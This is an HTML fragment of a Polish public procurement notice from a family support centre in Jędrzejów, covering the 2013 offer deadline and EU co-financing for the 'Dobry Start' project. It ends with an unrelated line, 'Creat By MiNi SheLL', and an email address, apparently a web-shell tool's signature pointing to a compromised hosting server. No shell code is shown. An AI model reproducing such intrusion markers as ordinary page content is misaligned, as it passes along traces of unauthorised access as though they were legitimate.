<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2013 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Jędrzejowie
 ul. Okrzei 49B,
28-300 Jędrzejów
sekretariat dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projektu współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 
Priorytet VII. Promocja integracji społecznej
Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji
Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie
Tytuł projektu: Dobry Start
oraz środków PFRON.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com